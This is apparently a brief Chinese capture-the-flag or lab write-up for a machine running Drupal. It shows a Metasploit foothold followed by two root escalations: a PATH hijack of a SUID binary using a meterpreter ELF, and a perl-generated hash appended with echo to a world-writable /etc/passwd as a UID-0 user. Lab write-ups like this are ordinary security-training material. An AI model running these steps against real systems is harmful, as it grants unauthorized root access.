80端口是个drupal
直接上msf得到低权限shell
之后提权
有两条路
1. SUID
find / -perm -u+s -type f 2>/dev/null
发现/opt下有东西
是个elf
strings看一下
生成个elf格式的meterpreter放到/tmp
之后把PATH改成/tmp即可
拿到root
2. passwd
/etc/passwd权限是777
???
写个root用户进去就行
生成密码哈希,密码是foo
perl -le 'print crypt("foo", "aa")'
写到passwd里
echo "naivekun:aaKNIEDOaueR6:0:0:root:/root:/bin/bash" >> passwd
拿到root